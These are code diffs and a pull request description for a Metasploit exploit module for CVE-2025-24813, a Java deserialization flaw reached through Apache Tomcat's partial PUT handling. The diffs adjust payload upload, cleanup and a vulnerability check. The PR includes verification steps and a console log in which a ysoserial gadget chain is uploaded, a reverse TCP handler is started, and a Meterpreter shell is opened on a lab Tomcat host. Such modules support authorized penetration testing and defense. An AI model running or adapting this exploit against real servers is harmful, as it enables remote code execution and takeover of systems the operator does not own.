     # Generate a random session id

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -128,29 +128,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_payload(cmd)
+    # Generate a random session id
+    session_id = Rex::Text.rand_text_alpha(10)
     # Determine the shell
     case target['Platform']
     when ['unix', 'linux']
       shell = 'bash'
+      register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
     when 'win'
       shell = 'cmd'
+      register_file_for_cleanup("..\\webapps\\ROOT\\#{session_id}.session}")
     else
       fail_with(Failure::NoTarget, "Unsupported target platform! (#{target['Platform']})")
     end
 
-    # Generate a random session id
-    session_id = Rex::Text.rand_text_alpha(10)
     res = send_partial_put(
       generate_java_deserialization_for_command(datastore['GADGET'].to_s, shell, cmd),
       "#{session_id}.session"
     )
 
-    case target['Platform']
-    when ['unix', 'linux']
-      register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
-    when 'win'
-      register_file_for_cleanup("..\\webapps\\ROOT\\#{session_id}.session}")
-    end
     # 201/204 is the normal success code
     # 409 indicates a conflict or file permission issue
     # but the partial file will still be created

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Tomcat Partial PUT Java Deserialization',
         'Description' => %q{
           This module exploits a Java deserialization vulnerability in Apache
-          Tomcats's session restoration functionality that can be exploited with a partial PUT
-          to place an attacker controlled deserialisazion payload in the work directory.
+          Tomcat's session restoration functionality that can be exploited with a partial PUT
+          to place an attacker controlled deserialization payload in the work directory.
 
           For the exploit to succeed, writes must be enabled for the default servlet,
           and org.apache.catalina.session.PersistentManager must be configured to use

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -82,7 +82,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
+    # Basic check to identify write enabled servers.
+    # Try to DELETE a random nonexistent file
+    # (Can only confirm that write ops are enabled,
+    # not that the PersistentManager is configured to
+    # use FileStore)
+    request = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha(10))
+    }
+    res = send_request_cgi(request)
+    if res && res.code != 405
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
   end
 
   def exploit
@@ -111,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
       session_file
     )
 
-    upload_success_codes = [200, 409]
+    upload_success_codes = [201, 409]
     unless res && upload_success_codes.include?(res.code)
       fail_with(Failure::UnexpectedReply, "Failed to upload payload: #{res.code}")
     end

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     trigger_res = trigger_payload(upload_session_id)
-    if trigger_res && trigger_res.code == 500
+    if trigger_res&.code == 500
       Exploit::CheckCode::Vulnerable
     else
       Exploit::CheckCode::Safe
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # 201/204 is the normal success code
     # 409 indicates a conflict or file permission issue
     # but the partial file will still be created
-    if res && [201, 204, 409].include?(res.code)
+    if [201, 204, 409].include?(res&.code)
       session_id
     end
   end


### PR DESCRIPTION
MSF Module for CVE-2025-24813 (Tomcat Partial PUT Deserialization)

## Verification

- Setup Tomcat as per: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md#establishing-a-vulnerable-tomcat-configuration
- I had to also add an additional JAR (`commons-collections:3.1`) for ysoserial gatdget `CommonsCollections6` to work 
(`wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar`)
```
msf6 > use multi/http/tomcat_partial_put_deserialization
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 192.168.178.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[*] Uploading ysoserial payload (UnXRatlDIY.session) via partial PUT
[*] Attempting to deserialize session file: UnXRatlDIY
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 192.168.178.93
[*] Meterpreter session 1 opened (192.168.178.103:4444 -> 192.168.178.93:34404) at 2025-03-19 17:56:54 +0000

meterpreter > shell
Process 13086 created.
Channel 1 created.

id
uid=984(tomcat) gid=984(tomcat) groups=984(tomcat)
```